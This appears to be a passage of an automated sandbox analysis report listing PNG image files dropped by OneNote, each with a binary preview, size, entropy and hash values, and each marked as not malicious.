                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
